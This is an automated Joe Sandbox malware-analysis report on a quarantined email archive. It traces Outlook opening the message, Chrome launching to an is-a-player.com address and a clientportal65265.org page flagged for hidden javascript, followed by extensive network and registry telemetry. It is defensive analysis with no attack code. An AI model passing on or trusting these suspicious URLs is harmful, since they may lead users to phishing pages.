Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quarantined Messages(9).zip

Overview

General Information

Sample name:Quarantined Messages(9).zip
Analysis ID:1524377
MD5:d0b2e490900517e47d99b92fadd6782f
SHA1:ef7b644648092578a3890c1f945ed043d22e61f3
SHA256:a84ad5387dd4803a60f346fc190ee587fe4da91c90df0f70f8e2ae83a51b1242
Infos:

Detection

Score:2
Range:0 - 100
Whitelisted:false
Confidence:60%

Signatures

HTML page contains hidden javascript code
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory

Classification

Process Tree

  • System is w10x64_ra
  • rundll32.exe (PID: 2744 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • OUTLOOK.EXE (PID: 6532 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Temp\Temp1_Quarantined Messages(9).zip\c2a65c0a-d2ae-4eac-21cd-08dce2de9da7\ef3049e0-344c-9ead-ea49-53e550940a43.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 4140 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "FB8C3304-C225-4C3E-9B5B-BC73B3822722" "A7F15C04-6E31-4F48-90D8-87131E5D097B" "6532" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://maoe.is-a-player.com/ MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 3964 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1936,i,13356850358512155363,12056628027222915284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Office Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6532, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://clientportal65265.org/salimre/agg.phpHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
Source: https://clientportal65265.org/salimre/agg.phpHTTP Parser: No favicon
Source: https://clientportal65265.org/salimre/agg.phpHTTP Parser: No favicon
Source: https://clientportal65265.org/salimre/agg.phpHTTP Parser: No favicon
Source: https://clientportal65265.org/salimre/agg.phpHTTP Parser: No favicon
Source: https://clientportal65265.org/salimre/agg.phpHTTP Parser: No favicon
Source: https://clientportal65265.org/salimre/agg.phpHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 2.23.209.189:443 -> 192.168.2.18:49701 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.18:49714 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.189
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: maoe.is-a-player.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: maoe.is-a-player.com
Source: global trafficDNS traffic detected: DNS query: clientportal65265.org
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownHTTPS traffic detected: 2.23.209.189:443 -> 192.168.2.18:49701 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.18:49714 version: TLS 1.2
Source: classification engineClassification label: clean2.winZIP@23/18@20/137
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241002T1159070764-6532.etl
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Temp\Temp1_Quarantined Messages(9).zip\c2a65c0a-d2ae-4eac-21cd-08dce2de9da7\ef3049e0-344c-9ead-ea49-53e550940a43.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "FB8C3304-C225-4C3E-9B5B-BC73B3822722" "A7F15C04-6E31-4F48-90D8-87131E5D097B" "6532" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "FB8C3304-C225-4C3E-9B5B-BC73B3822722" "A7F15C04-6E31-4F48-90D8-87131E5D097B" "6532" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://maoe.is-a-player.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1936,i,13356850358512155363,12056628027222915284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://maoe.is-a-player.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1936,i,13356850358512155363,12056628027222915284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
